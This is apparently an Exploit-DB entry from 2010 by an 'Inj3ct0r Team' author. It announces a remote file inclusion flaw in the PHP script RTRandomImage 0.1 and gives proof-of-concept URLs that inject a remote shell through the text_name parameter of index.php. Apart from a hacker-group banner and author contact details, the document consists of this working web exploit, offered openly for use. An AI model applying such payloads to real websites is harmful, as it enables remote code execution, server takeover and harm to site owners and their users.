RTRandomImage - Remote File Inclusion

EDB-ID:

13744

CVE:

N/A




Platform:

PHP

Date:

2010-06-06


|| || | ||  
 o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, 
 ( : / (_) / ( 
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : Inj3ct0r.com                                  0 
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 
0                                                                      0 
1                    ########################################          1 
0                    I'm Sn!pEr.S!Te member from Inj3ct0r Team          1 
1                    ########################################          0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ------------------------------------------------------------  
# Remote File Inclusion Vulnerability 
# -----------------------------------------------------------  
   
RTRandomImage <==0.1  (index.php) 
   
-------------------------------------------------------------- 
# [+] Author : Sn!pEr.S!Te Hacker #   
# [+] Email : sniper-site@HoTMaiL.coM #   
# [+] Inj3ct0r Team Hacker #   
# [+] 5-6-2010 #  
# [+] Script : Image Galleries » RTRandomImage# 
# [+]Version: [0.1] #
# [+] Download:http://www.toldo.info/roberto/files/RTRandomimage.zip
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
 -=[ exploit ]=-

http://localhost/RTRandomimage/index.php?text_name=[inj3ct0r sh3ll]


http://127.0.0.1/RTRandomimage/index.php?text_name=[inj3ct0r sh3ll]


=========================| -=[ THE END]=- |=========================